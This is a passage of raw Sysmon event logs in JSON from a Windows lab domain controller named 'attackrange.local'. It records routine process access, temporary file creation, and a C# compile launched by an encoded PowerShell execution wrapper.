07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5096,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.987\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.987","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5097,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.987\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.987","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5098,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.987\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-0010F20F0800}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.987","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-0010F20F0800}","TargetProcessId":"4856","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5099,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:12.424\r\nProcessGuid: {41C8662E-20CF-5F25-0000-00103D040800}\r\nProcessId: 2872\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\nga0qtan.dll\r\nCreationUtcTime: 2020-08-01 07:59:12.424","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:12.424","ProcessGuid":"{41C8662E-20CF-5F25-0000-00103D040800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\nga0qtan.dll","CreationUtcTime":"2020-08-01 07:59:12.424","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5100,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.424\r\nProcessGuid: {41C8662E-20CF-5F25-0000-00103D040800}\r\nProcessId: 2872\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\nga0qtan.cmdline\r\nCreationUtcTime: 2020-08-01 07:59:12.424","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.424","ProcessGuid":"{41C8662E-20CF-5F25-0000-00103D040800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\nga0qtan.cmdline","CreationUtcTime":"2020-08-01 07:59:12.424","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5101,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.435\r\nProcessGuid: {41C8662E-20D0-5F25-0000-001073150800}\r\nProcessId: 4444\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\nga0qtan.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {41C8662E-20CF-5F25-0000-00103D040800}\r\nParentProcessId: 2872\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.435","ProcessGuid":"{41C8662E-20D0-5F25-0000-001073150800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\nga0qtan.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{41C8662E-20CF-5F25-0000-00103D040800}","ParentProcessId":"2872","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5102,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.424\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00103D040800}\r\nSourceProcessId: 2872\r\nSourceThreadId: 4876\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D0-5F25-0000-001073150800}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFD1553B68F)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.424","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00103D040800}","SourceProcessId":"2872","SourceThreadId":"4876","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D0-5F25-0000-001073150800}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFD1553B68F)","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5103,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.424\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D0-5F25-0000-001073150800}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.424","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D0-5F25-0000-001073150800}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5104,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.424\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.424","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCR